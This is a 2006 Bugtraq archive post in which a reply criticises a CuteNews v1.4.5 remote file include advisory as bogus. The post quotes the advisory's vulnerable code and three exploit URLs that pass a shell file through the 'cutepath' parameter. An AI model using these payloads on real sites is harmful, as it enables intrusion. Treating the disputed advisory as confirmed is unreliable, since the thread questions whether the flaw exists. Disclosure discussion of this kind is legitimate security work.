Bugtraq mailing list archives
Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability
From: raven <locrideweb () libero it>
Date: Tue, 28 Nov 2006 11:58:46 +0100
The question is: Why who "find" a vuln, not check that is a really vuln ?Send faked vuln advisory is stupid and useless...for me... Bugtraq is a security mailinglist and there who post need to guarantee that is a real mistake. I cant believe that everytime that anyone send something, another person, write: "Is a bogus" "Not is a real vulnerability" or something like this...
Posters, check what you find, before send here. Regards, Francesco Vollero philip anselmo ha scritto:
Title : CuteNews v1.4.5 (search.php) Remote file include ######################################################################## ####### Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi} ------------------------------------------------------------------------ Sorce Code: ********** http://cutephp.com/ Affected software description : ****************************** vendor site: http://cutephp.com/ Application : CuteNews v1.4.5 Catégorie :Remote File Include ------------------------------------------------------------------------ Vulnerable Code: *************** require_once("$cutepath/inc/functions.inc.php"); require_once("$cutepath/data/config.php"); affected file: search.php & show_news.php & show_archives.php ---------------------------------------------------------------------- Exploit: ******* http://www.VicTim.com/[Script_Path]/show_archives.php?cutepath=Shell.txt? http://www.VicTim.com/[Script_Path]/show_news.php?cutepath=Shell.txt? http://www.VicTim.com/[Script_Path]/search.php?cutepath=Shell.txt? ------------------------------------------------------------------------ ----greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my friendsSpecial Greeting:AsbMay's Group & TrYaG TeaM channel:www.asb-may.net & www.tryag.com contact:spoonman500[at]hotmail[dot]com / ThE-LoRd-Of-CrAcKiNg () hotmail com _________________________________________________________________MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp.
Current thread:
- CuteNews v1.4.5 (search.php) Remote file include vulnerability philip anselmo (Nov 27)
- Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability Francesco Laurita (Nov 27)
- Re: CuteNews v1.4.5 (search.php) Remote file include vulnerability raven (Nov 29)